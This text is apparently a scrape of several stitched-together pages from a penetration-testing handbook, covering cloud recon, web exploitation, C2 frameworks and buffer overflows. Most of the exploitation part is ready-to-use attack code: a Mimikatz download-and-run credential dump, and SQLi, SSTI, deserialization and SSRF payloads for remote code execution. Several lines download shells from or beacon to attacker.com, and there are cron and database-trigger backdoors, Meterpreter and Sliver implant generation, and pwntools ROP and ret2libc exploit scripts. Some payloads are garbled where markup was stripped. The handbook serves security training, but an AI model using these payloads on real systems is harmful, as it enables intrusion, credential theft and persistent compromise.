bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" # Get all A records in zone Get-DnsRecord -RecordType A -ZoneName FQDN -Server ServerName | % {Add-Content -Value $_ -Path filename.txt} Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_AType WHERE ContainerName='domain.com'" # Get DC List nltest /dclist, nslookup -q=srv _kerberos._tcp [PreviousKerberos](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks) [NextGeneral](https://www.pentest-book.com/mobile/general) Last updated 5 years ago Was this helpful? Was this helpful? --- # Cloud Info Gathering | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud/cloud-info-recon.md) . Copy # Azure IP Ranges https://azurerange.azurewebsites.net/ # AWS IP Range https://ip-ranges.amazonaws.com/ip-ranges.json - Get creation date jq .createDate < ip-ranges.json - Get info for specific region jq '.prefixes[] | select(.region=="us-east-1")' < ip-ranges.json - Get all IPs jq -r '.prefixes | .[].ip_prefix' < ip-ranges.json # Online services https://viewdns.info/ https://securitytrails.com/ https://www.shodan.io/search?query=net%3A%2234.227.211.0%2F24%22 https://censys.io/ipv4?q=s3 #Azure AD Recon https://github.com/dievus/Oh365UserFinder #AWS Recon https://github.com/righteousgambit/quiet-riot # Google Dorks site:*.amazonaws.com -www "compute" site:*.amazonaws.com -www "compute" "ap-south-1" site:pastebin.com "rds.amazonaws.com" "u " pass OR password https://storage.googleapis.com/COMPANY # Check certificate transparency logs https://crt.sh %.netfilx.com # Find Cloud Services python3 cloud_enum.py -k keywork python3 CloudScraper.py -u https://example.com # AWS Buckets # Dork site:*.s3.amazonaws.com ext:xls | ext:xlsx | ext:csv password|passwd|pass user|username|uid|email # AWS discovering, stealing keys and endpoints # Nimbostratus - check against acutal profile https://github.com/andresriancho/nimbostratus python nimbostratus dump-credentials # ScoutSuite - audit AWS, GCP and Azure clouds scout --provider aws --profile stolen # Prowler - AWS security assessment, auditing and hardening https://github.com/toniblyx/prowler [PreviousGeneral](https://www.pentest-book.com/enumeration/cloud/general) [NextAWS](https://www.pentest-book.com/enumeration/cloud/aws) Last updated 3 years ago Was this helpful? Was this helpful? --- # General | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/mobile/general.md) . Copy # MobSF docker pull opensecurity/mobile-security-framework-mobsf docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest # Burp Add proxy in Mobile WIFI settings connected to Windows Host Wifi pointing to 192.168.X.1:8080 Vbox Settings Machine -> Network -> Port Forwarding -> 8080 Burp Proxy -> Options -> Listen all interfaces # Tools https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet https://github.com/MobSF/Mobile-Security-Framework-MobSF https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security # Flutter apps https://github.com/Hamz-a/boring-flutter https://github.com/ptswarm/reFlutter # Frida https://learnfrida.info/ # MobSF from cli https://github.com/MobSF/mobsfscan [PreviousPS tips & tricks](https://www.pentest-book.com/post-exploitation/windows/ps-tips-and-tricks) [NextAndroid](https://www.pentest-book.com/mobile/android) Last updated 1 year ago Was this helpful? Was this helpful? --- # Web Exploits & C2 | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/web-exploits.md) . [](https://www.pentest-book.com/exploitation/web-exploits#overview) Overview --------------------------------------------------------------------------------- This section covers practical exploitation techniques for common web vulnerabilities, focusing on achieving Remote Code Execution (RCE) and establishing initial access. [](https://www.pentest-book.com/exploitation/web-exploits#remote-code-execution-chains) Remote Code Execution Chains ------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/web-exploits#file-upload-to-rce) File Upload to RCE Copy # 1. Identify upload functionality # Look for profile pictures, document uploads, import features # 2. Test allowed extensions # Try: .php, .php5, .phtml, .phar, .php.jpg, .php%00.jpg # 3. Test content-type bypass curl -X POST "https://target.com/upload" \ -F "file=@shell.php;type=image/jpeg" \ -F "filename=shell.php" # 4. Test double extensions shell.php.jpg shell.jpg.php # 5. Test null byte (older systems) shell.php%00.jpg shell.php\x00.jpg # 6. Test .htaccess upload (Apache) # Upload .htaccess with: AddType application/x-httpd-php .jpg # Then upload shell.jpg # Simple PHP webshell # Obfuscated webshell ### [](https://www.pentest-book.com/exploitation/web-exploits#lfi-to-rce) LFI to RCE ### [](https://www.pentest-book.com/exploitation/web-exploits#ssti-to-rce) SSTI to RCE ### [](https://www.pentest-book.com/exploitation/web-exploits#deserialization-to-rce) Deserialization to RCE ### [](https://www.pentest-book.com/exploitation/web-exploits#xxe-to-rce) XXE to RCE ### [](https://www.pentest-book.com/exploitation/web-exploits#sqli-to-rce) SQLi to RCE ### [](https://www.pentest-book.com/exploitation/web-exploits#ssrf-to-rce) SSRF to RCE [](https://www.pentest-book.com/exploitation/web-exploits#c2-framework-basics) C2 Framework Basics ------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/web-exploits#sliver-open-source) Sliver (Open Source) ### [](https://www.pentest-book.com/exploitation/web-exploits#havoc-open-source) Havoc (Open Source) ### [](https://www.pentest-book.com/exploitation/web-exploits#metasploit) Metasploit ### [](https://www.pentest-book.com/exploitation/web-exploits#cobalt-strike-concepts) Cobalt Strike Concepts [](https://www.pentest-book.com/exploitation/web-exploits#establishing-persistence-after-rce) Establishing Persistence After RCE ------------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/web-exploits#web-server-persistence) Web Server Persistence ### [](https://www.pentest-book.com/exploitation/web-exploits#database-persistence) Database Persistence [](https://www.pentest-book.com/exploitation/web-exploits#post-exploitation-checklist) Post-Exploitation Checklist ----------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/web-exploits#resources) Resources ----------------------------------------------------------------------------------- * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) * [HackTricks](https://book.hacktricks.xyz/) * [GTFOBins](https://gtfobins.github.io/) * [RevShells](https://www.revshells.com/) * [ysoserial](https://github.com/frohoff/ysoserial) * [phpggc](https://github.com/ambionics/phpggc) [PreviousBuffer Overflow](https://www.pentest-book.com/exploitation/buffer-overflow) [NextLinux Kernel Exploits](https://www.pentest-book.com/exploitation/linux-kernel-2024) Last updated 5 months ago Was this helpful? * [Overview](https://www.pentest-book.com/exploitation/web-exploits#overview) * [Remote Code Execution Chains](https://www.pentest-book.com/exploitation/web-exploits#remote-code-execution-chains) * [File Upload to RCE](https://www.pentest-book.com/exploitation/web-exploits#file-upload-to-rce) * [LFI to RCE](https://www.pentest-book.com/exploitation/web-exploits#lfi-to-rce) * [SSTI to RCE](https://www.pentest-book.com/exploitation/web-exploits#ssti-to-rce) * [Deserialization to RCE](https://www.pentest-book.com/exploitation/web-exploits#deserialization-to-rce) * [XXE to RCE](https://www.pentest-book.com/exploitation/web-exploits#xxe-to-rce) * [SQLi to RCE](https://www.pentest-book.com/exploitation/web-exploits#sqli-to-rce) * [SSRF to RCE](https://www.pentest-book.com/exploitation/web-exploits#ssrf-to-rce) * [C2 Framework Basics](https://www.pentest-book.com/exploitation/web-exploits#c2-framework-basics) * [Sliver (Open Source)](https://www.pentest-book.com/exploitation/web-exploits#sliver-open-source) * [Havoc (Open Source)](https://www.pentest-book.com/exploitation/web-exploits#havoc-open-source) * [Metasploit](https://www.pentest-book.com/exploitation/web-exploits#metasploit) * [Cobalt Strike Concepts](https://www.pentest-book.com/exploitation/web-exploits#cobalt-strike-concepts) * [Establishing Persistence After RCE](https://www.pentest-book.com/exploitation/web-exploits#establishing-persistence-after-rce) * [Web Server Persistence](https://www.pentest-book.com/exploitation/web-exploits#web-server-persistence) * [Database Persistence](https://www.pentest-book.com/exploitation/web-exploits#database-persistence) * [Post-Exploitation Checklist](https://www.pentest-book.com/exploitation/web-exploits#post-exploitation-checklist) * [Resources](https://www.pentest-book.com/exploitation/web-exploits#resources) Was this helpful? Copy # Log poisoning (Apache/Nginx) # 1. Inject PHP into User-Agent curl -A "" "https://target.com/" # 2. Include the log file /var/log/apache2/access.log /var/log/nginx/access.log /var/log/httpd/access_log # Request: ?page=../../../var/log/apache2/access.log&cmd=id # PHP Session poisoning # 1. Set malicious session data curl "https://target.com/?page=" -H "Cookie: PHPSESSID=evil" # 2. Include session file ?page=../../../var/lib/php/sessions/sess_evil&cmd=id # /proc/self/environ (older PHP) # Inject PHP in User-Agent, include /proc/self/environ # PHP Wrappers # base64 encode to read files ?page=php://filter/convert.base64-encode/resource=config.php # expect:// (if enabled) ?page=expect://id # data:// (if enabled) ?page=data://text/plain,&cmd=id # input:// (POST data as include) POST ?page=php://input Copy # Detection payloads {{7*7}} ${7*7} <%= 7*7 %> #{7*7} *{7*7} # Jinja2 (Python/Flask) {{ config.items() }} {{ ''.__class__.__mro__[1].__subclasses__() }} {{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate() }} # More reliable Jinja2 RCE {% for x in ().__class__.__base__.__subclasses__() %} {% if "warning" in x.__name__ %} {{x()._module.__builtins__['__import__']('os').popen('id').read()}} {% endif %} {% endfor %} # Twig (PHP) {{['id']|filter('system')}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} # Freemarker (Java) <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") } # Thymeleaf (Java Spring) ${T(java.lang.Runtime).getRuntime().exec('id')} # Velocity (Java) #set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id')) Copy # Java (ysoserial) # Generate payload java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload.ser # Common gadget chains: # - CommonsCollections (1-7) # - CommonsBeanutils # - Spring # - JRMPClient # PHP (phpggc) # Generate payload phpggc Laravel/RCE1 system 'id' > payload.txt # Common chains: # - Laravel/RCE # - Symfony/RCE # - Guzzle/RCE # - Monolog/RCE # Python (pickle) import pickle import os class Exploit: def __reduce__(self): return (os.system, ('id',)) payload = pickle.dumps(Exploit()) # .NET # Use ysoserial.net ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o base64 Copy # Basic XXE file read \ ]> &xxe; # XXE to SSRF (internal network) \ ]> &xxe; # XXE to RCE via expect:// (PHP) \ ]> &xxe; # XXE to RCE via jar:// protocol (Java) # Upload malicious JAR to server, then: \ ]> &xxe; # Blind XXE with external DTD # On attacker server (evil.dtd): "> %eval; %exfil; # Payload: \ %xxe;\ ]> Copy # MySQL file write (INTO OUTFILE) ' UNION SELECT '' INTO OUTFILE '/var/www/html/shell.php'-- - # MySQL load_file for reading ' UNION SELECT load_file('/etc/passwd')-- - # MySQL UDF (User Defined Functions) # Requires FILE privilege # Upload malicious shared library # MSSQL xp_cmdshell '; EXEC xp_cmdshell 'whoami';-- '; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;-- '; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- '; EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"';-- # PostgreSQL # Copy to file COPY (SELECT '') TO '/var/www/html/shell.php'; # Large object SELECT lo_import('/etc/passwd'); SELECT lo_get(12345); -- oid from lo_import Copy # SSRF to internal admin panel http://target.com/fetch?url=http://localhost:8080/admin/execute?cmd=id # SSRF to cloud metadata → IAM credentials → RCE # AWS metadata http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name # Use credentials to access EC2 or run commands aws ssm send-command --instance-ids i-xxxx --document-name "AWS-RunShellScript" --parameters 'commands=["id"]' # SSRF to Redis → RCE gopher://localhost:6379/_CONFIG%20SET%20dir%20/var/www/html%0D%0ACONFIG%20SET%20dbfilename%20shell.php%0D%0ASET%20x%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%22%0D%0ASAVE # SSRF to Docker API → RCE gopher://localhost:2375/_POST%20/containers/create%20HTTP/1.1%0D%0AHost:localhost%0D%0AContent-Type:application/json%0D%0AContent-Length:XXX%0D%0A%0D%0A{"Image":"alpine","Cmd":["cat","/etc/shadow"],"Binds":["/:/host"]} Copy # Installation curl https://sliver.sh/install | sudo bash # Start server sliver-server # Generate implant generate --mtls attacker.com --save /tmp/implant # HTTP C2 generate --http attacker.com --save /tmp/http_implant # Start listener mtls --lhost 0.0.0.0 --lport 8888 # After session use info getuid shell upload /local/path /remote/path download /remote/path /local/path # Pivot pivots tcp --bind 0.0.0.0:9999 # Port forward portfwd add --remote 127.0.0.1:3389 --bind 0.0.0.0:3389 Copy # Start teamserver ./havoc server --profile /path/to/profile.yaotl # Connect client ./havoc client # In Havoc GUI: # 1. Create listener (HTTP/HTTPS) # 2. Generate payload (exe, dll, shellcode) # 3. Deploy and wait for callback # Post-exploitation: # - Process injection # - Token manipulation # - Lateral movement # - Credential harvesting Copy # Start handler msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST attacker.com set LPORT 443 exploit -j # Generate payload msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe -o shell.exe # Meterpreter post-exploitation getsystem hashdump load kiwi creds_all migrate run post/multi/recon/local_exploit_suggester Copy # Note: Commercial tool, concepts only # Beacon types: # - HTTP/HTTPS - web traffic blend # - DNS - DNS tunneling # - SMB - named pipes (lateral movement) # - TCP - raw TCP # Malleable C2: # - Customize traffic patterns # - Mimic legitimate software # - Evade network detection # Key features: # - Sleep/jitter for evasion # - Process injection # - Inline execution # - Memory-only payloads # Aggressor scripts: # - Automation # - Custom workflows # - Integration with other tools Copy # PHP backdoor in common files # Add to existing PHP file: # Hidden webshell # Save as .htaccess.php or similar dot file # Add to robots.txt: Disallow: /uploads/ # Scheduled task to download shell echo "* * * * * curl http://attacker.com/shell.sh | bash" >> /var/spool/cron/www-data # Modify application code # Add backdoor to login page, config file, or commonly accessed endpoint Copy -- MySQL trigger backdoor CREATE TRIGGER backdoor BEFORE INSERT ON users FOR EACH ROW BEGIN SET @output = (SELECT sys_exec('curl http://attacker.com/beacon')); END; -- PostgreSQL function backdoor CREATE OR REPLACE FUNCTION backdoor() RETURNS text AS $$ import os return os.popen('id').read() $$ LANGUAGE plpython3u; Copy ā–” Stabilize shell (upgrade to interactive) ā–” Enumerate current user privileges ā–” Check for credentials in: ā–” Config files (database connections) ā–” Environment variables ā–” .git/config, .svn/entries ā–” Backup files (.bak, .old, .swp) ā–” History files (.bash_history, .mysql_history) ā–” Enumerate internal network ā–” Identify other services/hosts ā–” Establish persistence ā–” Set up pivoting if needed ā–” Plan lateral movement --- # Buffer Overflow | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/buffer-overflow.md) . [](https://www.pentest-book.com/exploitation/buffer-overflow#overview) Overview ------------------------------------------------------------------------------------ Buffer overflows occur when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can lead to crashes, data corruption, or arbitrary code execution. [](https://www.pentest-book.com/exploitation/buffer-overflow#types-of-buffer-overflows) Types of Buffer Overflows ---------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/buffer-overflow#stack-based-buffer-overflow) Stack-Based Buffer Overflow Copy +------------------+ High Memory | Command Args | +------------------+ | Environment | +------------------+ | Stack | <- Grows downward | +------------+ | | | Local Vars | | | +------------+ | | | Saved EBP | | | +------------+ | | | Return Addr| | <- TARGET | +------------+ | | | Parameters | | | +------------+ | +------------------+ | Heap | <- Grows upward +------------------+ | BSS | +------------------+ | Data | +------------------+ | Text | +------------------+ Low Memory ### [](https://www.pentest-book.com/exploitation/buffer-overflow#heap-based-buffer-overflow) Heap-Based Buffer Overflow [](https://www.pentest-book.com/exploitation/buffer-overflow#finding-buffer-overflows) Finding Buffer Overflows -------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/buffer-overflow#fuzzing) Fuzzing ### [](https://www.pentest-book.com/exploitation/buffer-overflow#pattern-creation) Pattern Creation ### [](https://www.pentest-book.com/exploitation/buffer-overflow#gdb-analysis) GDB Analysis [](https://www.pentest-book.com/exploitation/buffer-overflow#exploitation-techniques) Exploitation Techniques ------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/exploitation/buffer-overflow#classic-return-address-overwrite) Classic Return Address Overwrite ### [](https://www.pentest-book.com/exploitation/buffer-overflow#return-to-shellcode) Return to Shellcode ### [](https://www.pentest-book.com/exploitation/buffer-overflow#return-to-libc-ret2libc) Return to libc (ret2libc) ### [](https://www.pentest-book.com/exploitation/buffer-overflow#return-oriented-programming-rop) Return Oriented Programming (ROP) ### [](https://www.pentest-book.com/exploitation/buffer-overflow#id-64-bit-exploitation) 64-bit Exploitation [](https://www.pentest-book.com/exploitation/buffer-overflow#bypassing-protections) Bypassing Protections -------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/buffer-overflow#aslr-bypass) ASLR Bypass ### [](https://www.pentest-book.com/exploitation/buffer-overflow#stack-canary-bypass) Stack Canary Bypass ### [](https://www.pentest-book.com/exploitation/buffer-overflow#nx-dep-bypass) NX/DEP Bypass ### [](https://www.pentest-book.com/exploitation/buffer-overflow#pie-bypass) PIE Bypass [](https://www.pentest-book.com/exploitation/buffer-overflow#format-string-attacks) Format String Attacks -------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/buffer-overflow#windows-buffer-overflows) Windows Buffer Overflows -------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/buffer-overflow#finding-bad-characters) Finding Bad Characters ### [](https://www.pentest-book.com/exploitation/buffer-overflow#jmp-esp-technique) JMP ESP Technique ### [](https://www.pentest-book.com/exploitation/buffer-overflow#seh-overwrite) SEH Overwrite ### [](https://www.pentest-book.com/exploitation/buffer-overflow#egghunter) Egghunter [](https://www.pentest-book.com/exploitation/buffer-overflow#useful-tools) Useful Tools -------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/buffer-overflow#debugging-commands) Debugging Commands -------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/buffer-overflow#practice-resources) Practice Resources -------------------------------------------------------------------------------------------------------- * [Protostar](https://exploit.education/protostar/) * [Phoenix](https://exploit.education/phoenix/) * [ROP Emporium](https://ropemporium.com/) * [pwnable.kr](http://pwnable.kr/) * [pwnable.tw](https://pwnable.tw/) * [Nightmare Course](https://guyinatuxedo.github.io/) * [LiveOverflow Binary Exploitation](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN) [PreviousPrivilege Escalation](https://www.pentest-book.com/exploitation/privilege-escalation) [NextWeb Exploits & C2](https://www.pentest-book.com/exploitation/web-exploits) Last updated 5 months ago Was this helpful? * [Overview](https://www.pentest-book.com/exploitation/buffer-overflow#overview) * [Types of Buffer Overflows](https://www.pentest-book.com/exploitation/buffer-overflow#types-of-buffer-overflows) * [Stack-Based Buffer Overflow](https://www.pentest-book.com/exploitation/buffer-overflow#stack-based-buffer-overflow) * [Heap-Based Buffer Overflow](https://www.pentest-book.com/exploitation/buffer-overflow#heap-based-buffer-overflow) * [Finding Buffer Overflows](https://www.pentest-book.com/exploitation/buffer-overflow#finding-buffer-overflows) * [Fuzzing](https://www.pentest-book.com/exploitation/buffer-overflow#fuzzing) * [Pattern Creation](https://www.pentest-book.com/exploitation/buffer-overflow#pattern-creation) * [GDB Analysis](https://www.pentest-book.com/exploitation/buffer-overflow#gdb-analysis) * [Exploitation Techniques](https://www.pentest-book.com/exploitation/buffer-overflow#exploitation-techniques) * [Classic Return Address Overwrite](https://www.pentest-book.com/exploitation/buffer-overflow#classic-return-address-overwrite) * [Return to Shellcode](https://www.pentest-book.com/exploitation/buffer-overflow#return-to-shellcode) * [Return to libc (ret2libc)](https://www.pentest-book.com/exploitation/buffer-overflow#return-to-libc-ret2libc) * [Return Oriented Programming (ROP)](https://www.pentest-book.com/exploitation/buffer-overflow#return-oriented-programming-rop) * [64-bit Exploitation](https://www.pentest-book.com/exploitation/buffer-overflow#id-64-bit-exploitation) * [Bypassing Protections](https://www.pentest-book.com/exploitation/buffer-overflow#bypassing-protections) * [ASLR Bypass](https://www.pentest-book.com/exploitation/buffer-overflow#aslr-bypass) * [Stack Canary Bypass](https://www.pentest-book.com/exploitation/buffer-overflow#stack-canary-bypass) * [NX/DEP Bypass](https://www.pentest-book.com/exploitation/buffer-overflow#nx-dep-bypass) * [PIE Bypass](https://www.pentest-book.com/exploitation/buffer-overflow#pie-bypass) * [Format String Attacks](https://www.pentest-book.com/exploitation/buffer-overflow#format-string-attacks) * [Windows Buffer Overflows](https://www.pentest-book.com/exploitation/buffer-overflow#windows-buffer-overflows) * [Finding Bad Characters](https://www.pentest-book.com/exploitation/buffer-overflow#finding-bad-characters) * [JMP ESP Technique](https://www.pentest-book.com/exploitation/buffer-overflow#jmp-esp-technique) * [SEH Overwrite](https://www.pentest-book.com/exploitation/buffer-overflow#seh-overwrite) * [Egghunter](https://www.pentest-book.com/exploitation/buffer-overflow#egghunter) * [Useful Tools](https://www.pentest-book.com/exploitation/buffer-overflow#useful-tools) * [Debugging Commands](https://www.pentest-book.com/exploitation/buffer-overflow#debugging-commands) * [Practice Resources](https://www.pentest-book.com/exploitation/buffer-overflow#practice-resources) Was this helpful? Copy # Heap overflows corrupt heap metadata or adjacent heap objects # Can lead to arbitrary write primitives # More complex to exploit but still dangerous Copy # Simple fuzzing with pattern python3 -c "print('A' * 1000)" | ./vulnerable_program # Using AFL++ afl-fuzz -i input/ -o output/ -- ./vulnerable_program @@ # Using Boofuzz (network) # See boofuzz documentation for protocol-specific fuzzing Copy # Metasploit pattern /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000 # Find offset /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41326341 # Python alternative from pwn import * cyclic(1000) # Create pattern cyclic_find(0x61616174) # Find offset Copy # Run program in GDB gdb ./vulnerable # Set breakpoint at vulnerable function b vulnerable_function # Run with input run $(python3 -c "print('A'*100)") # Check registers after crash info registers # Examine stack x/100x $esp # Check memory protections checksec Copy #!/usr/bin/env python3 from pwn import * # Configuration binary = './vulnerable' elf = ELF(binary) # Calculate offset (found via pattern) offset = 76 # Build payload payload = b'A' * offset # Padding to reach return address payload += p32(0xdeadbeef) # Overwrite return address # Run exploit p = process(binary) p.sendline(payload) p.interactive() Copy #!/usr/bin/env python3 from pwn import * binary = './vulnerable' offset = 76 # Shellcode (Linux x86 execve /bin/sh) shellcode = asm(shellcraft.sh()) # NOP sled + shellcode nop_sled = b'\x90' * 100 shellcode_addr = 0xbffff000 # Address where shellcode lands (find via debugging) payload = nop_sled payload += shellcode payload += b'A' * (offset - len(payload)) payload += p32(shellcode_addr) p = process(binary) p.sendline(payload) p.interactive() Copy #!/usr/bin/env python3 from pwn import * # Bypass NX (non-executable stack) by returning to libc functions binary = './vulnerable' elf = ELF(binary) libc = ELF('/lib/i386-linux-gnu/libc.so.6') # Find libc base (with ASLR disabled or leaked) # For demonstration, ASLR disabled libc_base = 0xf7c00000 # Calculate addresses system_addr = libc_base + libc.symbols['system'] exit_addr = libc_base + libc.symbols['exit'] binsh_addr = libc_base + next(libc.search(b'/bin/sh')) offset = 76 # Payload: system("/bin/sh") payload = b'A' * offset payload += p32(system_addr) # Return to system() payload += p32(exit_addr) # Return address after system (clean exit) payload += p32(binsh_addr) # Argument to system() p = process(binary) p.sendline(payload) p.interactive() Copy #!/usr/bin/env python3 from pwn import * # ROP chains use existing code gadgets to bypass DEP/NX binary = './vulnerable' elf = ELF(binary) rop = ROP(elf) # Find gadgets # ropper -f ./vulnerable # ROPgadget --binary ./vulnerable # Example: mprotect to make stack executable, then jump to shellcode # Or: execve("/bin/sh", NULL, NULL) offset = 76 # Using pwntools ROP rop.raw(0x41414141) # pop gadget rop.call(elf.plt['puts'], [elf.got['puts']]) # Leak libc address rop.call(elf.symbols['main']) # Return to main for second stage payload = b'A' * offset + rop.chain() p = process(binary) p.sendline(payload) # Parse leaked address leaked = u32(p.recv(4)) log.info(f"Leaked puts: {hex(leaked)}") Copy #!/usr/bin/env python3 from pwn import * # 64-bit uses different calling convention # First 6 args: RDI, RSI, RDX, RCX, R8, R9 # Need gadgets to control these registers binary = './vulnerable64' elf = ELF(binary) rop = ROP(elf) # Find gadgets # pop rdi; ret pop_rdi = 0x401234 offset = 72 # 64-bit typically has different offsets # Call system("/bin/sh") in 64-bit libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') libc_base = 0x7ffff7c00000 # Example, needs to be leaked system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + next(libc.search(b'/bin/sh')) payload = b'A' * offset payload += p64(pop_rdi) # pop rdi; ret payload += p64(binsh_addr) # /bin/sh string payload += p64(system_addr) # system() p = process(binary) p.sendline(payload) p.interactive() Copy # Address Space Layout Randomization # Randomizes stack, heap, libraries, and sometimes binary # Techniques: # 1. Information leak - leak an address to calculate base # 2. Brute force (32-bit has limited entropy) # 3. Return to PLT (not randomized in partial RELRO) # 4. ret2plt to leak GOT entries # Example: Leak libc address via puts from pwn import * binary = './vulnerable' elf = ELF(binary) rop = ROP(elf) # Stage 1: Leak libc address payload1 = b'A' * offset payload1 += p64(pop_rdi) payload1 += p64(elf.got['puts']) # Argument: GOT entry of puts payload1 += p64(elf.plt['puts']) # Call puts to print address payload1 += p64(elf.symbols['main']) # Return to main p = process(binary) p.sendline(payload1) p.recvuntil(b'...') # Receive until leak leaked_puts = u64(p.recv(6).ljust(8, b'\x00')) log.info(f"Leaked puts: {hex(leaked_puts)}") # Calculate libc base libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') libc_base = leaked_puts - libc.symbols['puts'] Copy # Stack canaries are random values placed before return address # Program crashes if canary is modified # Techniques: # 1. Information leak to get canary value # 2. Brute force (byte by byte in forking servers) # 3. Overwrite only variables before canary (for different attacks) # Example: Leak canary via format string payload = b'%15$p' # Leak canary position (varies) p.sendline(payload) canary = int(p.recv().strip(), 16) # Then include correct canary in overflow payload = b'A' * offset_to_canary payload += p64(canary) payload += b'A' * 8 # Saved RBP payload += p64(target_address) Copy # Non-Executable stack prevents shellcode execution # Use return-to-libc or ROP instead # Check if NX is enabled checksec ./vulnerable # Output: NX enabled # Bypass options: # 1. ret2libc (call existing functions) # 2. ROP (chain gadgets) # 3. ret2plt # 4. mprotect() to make memory executable Copy # Position Independent Executable # Binary loaded at random base address # Need to leak binary base address # Or use partial overwrite (only overwrite lower bytes) # Partial overwrite example (if ASLR entropy allows) # Overwrite only last 2 bytes of return address payload = b'A' * offset payload += b'\x00\x12' # Only change last 2 bytes to 0x1200 # Or leak binary address from stack Copy # Format string bugs can read/write arbitrary memory # Reading memory payload = b'AAAA' + b'.%x' * 20 # Leak stack values payload = b'%7$s' + p64(address) # Read from specific address # Writing memory (overwrite GOT entry) # Write small value payload = b'%100c%7$n' + p64(target_addr) # Write 100 to target_addr # Write larger values (byte by byte) from pwntools import fmtstr writes = {target_addr: desired_value} payload = fmtstr.fmtstr_payload(offset, writes) Copy # Bad chars break the payload (null bytes, newlines, etc.) badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" b"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" # ... continue through 0xff ) # Send and check which bytes are mangled in memory Copy # Windows: find JMP ESP in loaded DLLs # Use mona.py in Immunity Debugger # !mona jmp -r esp -cpb "\x00\x0a\x0d" # Build payload import struct offset = 2003 jmp_esp = struct.pack(' checksec pwndbg> cyclic 200 pwndbg> run pwndbg> cyclic -l $rsp # GDB with GEF gef> pattern create 200 gef> pattern search # Find string in binary strings -a -t x ./vulnerable | grep "/bin/sh" # Find gadgets objdump -d ./vulnerable | grep -A2 "pop" --- # Cloud | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud.md) . * [General](https://www.pentest-book.com/enumeration/cloud/general) * [AWS](https://www.pentest-book.com/enumeration/cloud/aws) * [Azure](https://www.pentest-book.com/enumeration/cloud/azure) * [Google Cloud Platform](https://www.pentest-book.com/enumeration/cloud/gcp) * [Cloud Info Gathering](https://www.pentest-book.com/enumeration/cloud/cloud-info-recon) * [Docker && Kubernetes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes) * [CDNs](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting) [PreviousOthers](https://www.pentest-book.com/enumeration/webservices/others) [NextGeneral](https://www.pentest-book.com/enumeration/cloud/general) Last updated 2 years ago Was this helpful? Was this helpful? --- # tools everywhere | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/tools-everywhere.md) . 